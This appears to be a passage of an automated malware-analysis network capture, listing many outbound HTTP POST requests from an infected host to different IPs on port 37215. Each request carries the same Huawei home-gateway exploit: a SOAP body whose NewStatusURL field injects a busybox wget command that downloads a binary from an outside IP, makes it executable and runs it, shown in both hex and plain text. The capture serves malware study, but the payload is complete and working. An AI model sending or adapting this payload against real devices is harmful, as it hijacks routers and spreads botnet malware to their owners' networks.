                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            460192.168.2.1541318197.72.157.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784221888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            461192.168.2.1549578197.100.229.3537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784239054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            462192.168.2.1541848197.107.234.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784269094 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            463192.168.2.1537668197.98.19.23937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784291983 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            464192.168.2.1538498197.62.215.5637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784333944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            465192.168.2.1554882197.162.174.2637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784344912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            466192.168.2.1548542197.216.234.24137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784363985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            467192.168.2.1545190197.45.61.14037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784388065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            468192.168.2.1545914197.11.21.1237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784410000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            469192.168.2.1546326197.138.83.8437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.784442902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
